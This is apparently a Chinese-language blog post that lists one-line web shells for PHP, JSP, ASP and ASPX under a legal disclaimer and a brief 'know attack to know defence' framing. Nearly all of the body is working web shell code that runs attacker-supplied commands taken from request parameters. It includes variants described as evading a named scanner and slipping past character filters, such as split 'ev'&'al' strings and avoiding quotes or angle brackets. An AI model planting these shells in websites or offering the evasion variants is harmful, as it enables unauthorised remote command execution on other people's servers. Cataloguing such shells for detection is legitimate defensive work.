声明
遵纪守法
请严格遵守网络安全法相关条例!
此分享主要用于交流学习,请勿用于非法用途,一切后果自付。
一切未经授权的网络攻击均为违法行为,互联网非法外之地。
反制
大家在知道了常规一句话的木马之后,就可以通过关键字或者更高级的方式来查看服务器是否存在木马。不知攻、焉知防。
最经典的 php一句话
java
<?php eval(@$_POST['cmd']); ?>
php7中此命令是不行的,可以拼接命令绕过。这也显示了攻防的对抗和进化。
java
<?php
$p = $_POST['cmd'];
@eval($p);
?>
jsp一句话:
java
<%
Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
// System.out.println(process);
InputStream inputStream = process.getInputStream();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = bufferedReader.readLine()) != null){
response.getWriter().println(line);
}
%>
images
java
<!--#include file="images\1.jpg" -->
<%eval request("3")%>
<%execute request("3")%>
<%execute(request("3"))%>
<%If Request("3")<>"" Then Execute(Request("3"))%>
<%if request ("3")<>""then session("3")=request("3"):end if:if session("3")<>"" then execute session
("3")%>
<SCRIPT language=VBScript runat="server">execute request("3")</SCRIPT>
<%@ Page Language="Jscript"%>
<%eval(Request.Item["3"],"unsafe");%>
asp一句话
java
<%execute(request("3"))%>
aspx一句话
java
<script language="C#" runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>
可以躲过雷客图的一句话。
java
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>
不用'<,>'的asp一句话
java
<script language=VBScript runat=server>execute request("1")</script>
不用双引号的一句话。
java
<%eval request(chr(35))%>
参考: